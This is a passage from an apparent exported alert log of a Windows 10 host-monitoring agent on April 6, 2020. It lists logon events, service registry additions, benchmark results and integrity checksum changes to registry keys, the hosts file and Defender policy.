14:26:59.225",5,"Windows System error event", +"Apr 6, 2020 @ 14:26:59.222",5,"Windows System error event", +"Apr 6, 2020 @ 14:26:58.506",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +" +"Apr 6, 2020 @ 14:26:58.242",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : 'e8e23284dccb7ccee8c1c0f3d044aca0' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : 'b6870b3d74893979c44b3336a301dce27cd672f1' +" +"Apr 6, 2020 @ 14:26:57.600",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : '03aad37d2328a1b41c130ad79ee23de7' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '8f018594a2fffb11ad549b80854873098cfd2b7a' +" +"Apr 6, 2020 @ 14:26:57.490",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:57.476",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2c34c\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:26:57.459",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:57.446",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_163a67' was added. +" +"Apr 6, 2020 @ 14:26:57.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_163a67\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:26:57.412",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_163a67\Security' was added. 
+" +"Apr 6, 2020 @ 14:26:57.335",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:26:57.320",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:26:57.289",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:26:57.258",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:26:57.241",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:26:57.194",5,"Windows Push Notifications User Service_163a67 terminated unexpectedly", +"Apr 6, 2020 @ 14:26:57.178",5,"Sync Host_163a67 terminated unexpectedly", +"Apr 6, 2020 @ 14:26:57.163",5,"Connected Devices Platform User Service_163a67 terminated unexpectedly", +"Apr 6, 2020 @ 14:26:57.147",5,"Clipboard User Service_163a67 terminated unexpectedly", +"Apr 6, 2020 @ 14:26:50.132",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '578f6159462dbf35644b32173a6272dc' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : '22d6c3d14484030a1223ac49b63a08d1adfb9f12' +" +"Apr 6, 2020 @ 14:26:48.913",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f906c668d9a9517e97299e9a3d5136fe' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +" +"Apr 6, 2020 @ 14:26:46.679",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:26:46.218",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : '8c770c3cc590a59f4fec7b255faee1f2' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : '327f74762b95e433a1a48c7b90680a4e0a0bce77' +" +"Apr 6, 2020 @ 14:26:45.682",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f906c668d9a9517e97299e9a3d5136fe' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +" +"Apr 6, 2020 @ 14:26:45.492",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:26:44.668",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 6, 2020 @ 14:26:44.001",9,"Windows Application error event", +"Apr 6, 2020 @ 14:26:42.741",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:26:41.444",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:26:36.991",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : '84f9da38aef52b57b0f950a9bf807f50' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : 'da7ce1f2de2fac02702a496feefad65ff9721121' +" +"Apr 6, 2020 @ 14:26:28.975",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. 
+Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '62adcc7d0cabf983a9a5489de147c514' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : '223860dda4c8b799b031b85964a111ab435e0f6f' +" +"Apr 6, 2020 @ 14:26:27.585",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:27.569",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:27.562",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:27.522",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:27.459",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:27.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:27.131",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:27.116",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:26.823",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:26.803",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2c34c\Security' was added. 
+" +"Apr 6, 2020 @ 14:26:26.788",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:26.757",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:26.521",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:26.491",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:26.475",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:26.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:26.271",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:26.241",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:25.944",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:25.922",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:25.772",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. 
+Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '584b2e2ecab9f7b853efa748028018d4698a2e87' +" +"Apr 6, 2020 @ 14:26:24.271",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:24.238",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:24.212",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:24.195",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:24.043",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:24.009",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:23.981",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:23.971",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:23.840",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:23.825",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:23.813",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_163a67' was added. 
+" +"Apr 6, 2020 @ 14:26:23.787",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:21.633",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:21.615",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 14:26:21.585",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 14:26:21.568",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:26:21.553",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:26:21.537",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:26:21.522",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:21.506",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67' was added. +" +"Apr 6, 2020 @ 14:26:21.492",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 14:26:21.479",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\3' was added. 
+" +"Apr 6, 2020 @ 14:26:21.463",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:26:21.446",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:26:21.428",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:26:21.402",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:20.340",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:20.291",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:20.257",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_163a67' was added. +" +"Apr 6, 2020 @ 14:26:20.247",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:19.959",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. +Old md5sum was: '60dd34472b7c4b4733f08655c4f60df2' +New md5sum is : '2c61255f33c4fb43a225480258ec4380' +Old sha1sum was: '525a1f729b820c37784c2e975a559deaf184ebb7' +New sha1sum is : '3d522bd22a6f5275d938735abc8eefcd62d2e82c' +" +"Apr 6, 2020 @ 14:26:19.943",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. 
+Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : 'd13ad6eb1737d32be81bf0fbad2ea850' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : 'd99b8a072444d528506f4a8568712fe5ddf19d83' +" +"Apr 6, 2020 @ 14:26:19.934",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '6a5ba5db7a5af421f75d94743743fe75' +New md5sum is : 'a94717f9cc73ebc01ca04b0844af85df' +Old sha1sum was: '31ff396526e9de372a9c73b66b754121a6110de5' +New sha1sum is : 'f239544f614ade15297b6b97ca2eb82e97b517de' +" +"Apr 6, 2020 @ 14:26:19.899",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '6b831538504aed43ca0079095c23729d' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '1d76c9113ab9a7701e6f8efb24ed1dfcfe36b391' +" +"Apr 6, 2020 @ 14:26:17.678",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:17.652",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:17.616",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:17.600",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_163a67\Security' was added. 
+" +"Apr 6, 2020 @ 14:26:12.446",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:26:04.128",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:26:04.091",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:26:02.521",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:26:02.271",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:25:50.630",5,"Windows System error event", +"Apr 6, 2020 @ 14:25:50.615",5,"Windows System error event", +"Apr 6, 2020 @ 14:25:47.975",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:25:47.803",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:25:47.762",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:25:47.708",5,"Windows Push Notifications User Service_2c34c terminated unexpectedly", +"Apr 6, 2020 @ 14:25:47.677",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:25:47.662",5,"Connected Devices Platform User Service_2c34c terminated unexpectedly", +"Apr 6, 2020 @ 14:25:47.428",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:25:47.412",5,"Clipboard User Service_2c34c terminated unexpectedly", +"Apr 6, 2020 @ 14:25:42.506",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"Apr 6, 2020 @ 14:25:41.615",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}' checksum changed. 
+Old md5sum was: '2a569169f4c48da58d55d87631b3625e' +New md5sum is : 'eabef0d1f7faf9368acee28f84f9b211' +Old sha1sum was: '2ff153ca41593d1937308f478acf09efa60a0930' +New sha1sum is : 'be8f5aa697bbfd3ee56c683cc08676dc72effdcd' +" +"Apr 6, 2020 @ 14:25:41.287",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main' checksum changed. +Old md5sum was: 'e926791c45461d05188fa45b7dfbea50' +New md5sum is : '1763e3f11e8f89848387ac81ad778aa5' +Old sha1sum was: 'f01955b750dd7024d0ec41bb6eb55cdeb3f2114a' +New sha1sum is : '12d11f0fa820cffcd9480bcdf6f248b633070537' +" +"Apr 6, 2020 @ 14:25:37.709",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:25:36.709",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:25:35.428",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:25:35.381",9,"Windows Application error event", +"Apr 6, 2020 @ 14:25:31.599",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +" +"Apr 6, 2020 @ 14:25:28.647",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:25:09.678",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender' checksum changed. +Old md5sum was: '59cb747b331c527a030961483156cea0' +New md5sum is : 'bd77bf299c0366a5a3013dd7209f2afa' +Old sha1sum was: '797f0246bbcb2020cc30cde64c69b48810b0e47e' +New sha1sum is : '064e1756881953a404b3daf932947bef82ccadd4' +" +"Apr 6, 2020 @ 14:25:08.693",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender' checksum changed. 
+Old md5sum was: '59cb747b331c527a030961483156cea0' +New md5sum is : 'bd77bf299c0366a5a3013dd7209f2afa' +Old sha1sum was: '797f0246bbcb2020cc30cde64c69b48810b0e47e' +New sha1sum is : '064e1756881953a404b3daf932947bef82ccadd4' +" +"Apr 6, 2020 @ 14:24:59.677",7,"Integrity checksum changed.","File 'c:\windows\system32\drivers\etc\hosts' checksum changed. +Size changed from '2103' to '824' +Old md5sum was: 'a4eca8014112a13122660b77e6f9eca2' +New md5sum is : '3688374325b992def12793500307566d' +Old sha1sum was: '07cce3458b422d02db7ad9cfbe227369ab2aa072' +New sha1sum is : '4bed0823746a2a8577ab08ac8711b79770e48274' +Old sha256sum was: 'd311a04d648b6a745f75a8d55d063343bbb8758dfcf0affe1dda9b7617dd4bc6' +New sha256sum is : '2d6bdfb341be3a6234b24742377f93aa7c7cfb0d9fd64efa9282c87852e57085' +Old modification time was: 'Sat Apr 4 15:55:41 2020', now it is 'Tue Mar 19 04:49:40 2019' +" +"Apr 6, 2020 @ 14:24:59.618",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:24:59.116",7,"Integrity checksum changed.","File 'c:\windows\sysnative\drivers\etc\hosts' checksum changed. 
+Size changed from '2103' to '824' +Old md5sum was: 'a4eca8014112a13122660b77e6f9eca2' +New md5sum is : '3688374325b992def12793500307566d' +Old sha1sum was: '07cce3458b422d02db7ad9cfbe227369ab2aa072' +New sha1sum is : '4bed0823746a2a8577ab08ac8711b79770e48274' +Old sha256sum was: 'd311a04d648b6a745f75a8d55d063343bbb8758dfcf0affe1dda9b7617dd4bc6' +New sha256sum is : '2d6bdfb341be3a6234b24742377f93aa7c7cfb0d9fd64efa9282c87852e57085' +Old modification time was: 'Sat Apr 4 15:55:41 2020', now it is 'Tue Mar 19 04:49:40 2019' +" +"Apr 6, 2020 @ 14:24:58.115",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:24:57.659",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:24:55.911",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:24:55.896",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:24:55.865",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:24:55.849",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:24:55.396",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 6, 2020 @ 14:24:49.540",3,"The Windows Search Service started", +"Apr 6, 2020 @ 14:24:49.117",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:24:48.944",3,"The database engine attached a database", +"Apr 6, 2020 @ 14:24:48.827",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed", +"Apr 6, 2020 @ 14:24:48.780",3,"The database engine is starting a new instance", +"Apr 6, 2020 @ 14:24:42.403",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:24:41.958",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:24:41.928",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:24:40.942",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:24:40.586",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:24:39.892",3,"Ossec agent started.","ossec: Agent started: 
'windows-10->any'." +"Apr 6, 2020 @ 14:24:10.557",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 6, 2020 @ 14:24:10.541",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: '44a185f2e5e0fa09edbcbe3e598fe4da' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"Apr 6, 2020 @ 14:24:07.945",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:24:07.932",5,"WSearch was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:22:27.224",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : 'd8c503783bde9bba94c7b5e9b6f56d5e' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : 'cd5545ba37f52a71c7212842358b2c7891cc67c1' +" +"Apr 6, 2020 @ 14:22:27.177",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '3bed6b4b8101da842bb6afe04a8271c2' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +" +"Apr 6, 2020 @ 14:22:14.990",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. 
+Old md5sum was: 'e7b15bf68d8864eba94868ebca21f3a9' +New md5sum is : '0231145ca99a840395c3772f19d7bf2e' +Old sha1sum was: '89d53aab4bb2b7f60e8bc004c8644a2d57b627e1' +New sha1sum is : '8bb61b82ef06aca0226aabaabd5850edec858d9a' +" +"Apr 6, 2020 @ 14:22:13.932",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '943a3530927d924772ada9a68caa61d2' +New md5sum is : 'b0d74b8b9da27bf097def0edef51976a' +Old sha1sum was: '129e0b2682884d08dd905e554c2c1d027314e17b' +New sha1sum is : '85c2962a659d70880b1f863906002042ff403691' +" +"Apr 6, 2020 @ 14:22:13.879",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0a11a072fc5a95522aa8ca6087115073' +New md5sum is : 